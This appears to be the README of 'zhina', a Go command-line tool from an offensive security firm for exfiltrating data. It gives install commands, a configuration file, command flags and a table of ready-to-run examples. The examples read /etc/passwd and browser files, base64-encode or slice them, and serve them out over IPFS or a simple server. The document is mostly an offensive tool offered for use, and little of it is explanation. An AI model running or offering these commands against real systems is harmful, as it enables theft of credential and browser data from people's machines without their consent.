A simple app to exfiltration data with some features.
A tools for exfiltration with mutliple way.
Brought to you by:
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
You can install a few ways:
- Download the binary for your OS from https://github.com/HadessCS/zhina/releases
- or use
go install
go install -v github.com/hadesscs/zhina
- or clone the git repo and build
git clone https://github.com/hadesscs/zhina.git cd zhina go get -v go build
Create a configuration file called config.yaml
an example is available below:
---
infura:
PROJECT_ID: [PROJECT_ID]
API_SECRET_KEY: [API_SECRET_KEY]
When zhina runs it checks the current directory for a config.yaml
, if you wish to use a different configuration file use the command --config /path/to/file.yaml
--all For all devices
--config string Configuration file: /path/to/file.yaml, default = ./config.yaml (default "config.yaml")
--debug Display debugging information
--device string What device to query, (default: "all")
--displayconfig Display configuration
--do string encode64
--path string Path to Exfiltrate
--serve type How Exfiltrate
--version Display version information
--help Display help
Command | Details |
---|---|
zhina --do encode64 --path /etc/passwd |
Exfiltrate password file |
zhina --path browser --slice slice1M --serve ipfs |
Exfiltrate Browser Files with 1M slice and serve on ipfs |
zhina --path /etc/passwd --slice slice1M --serve simple |
Exfiltrate Browser Files with 1M slice and serve on simple |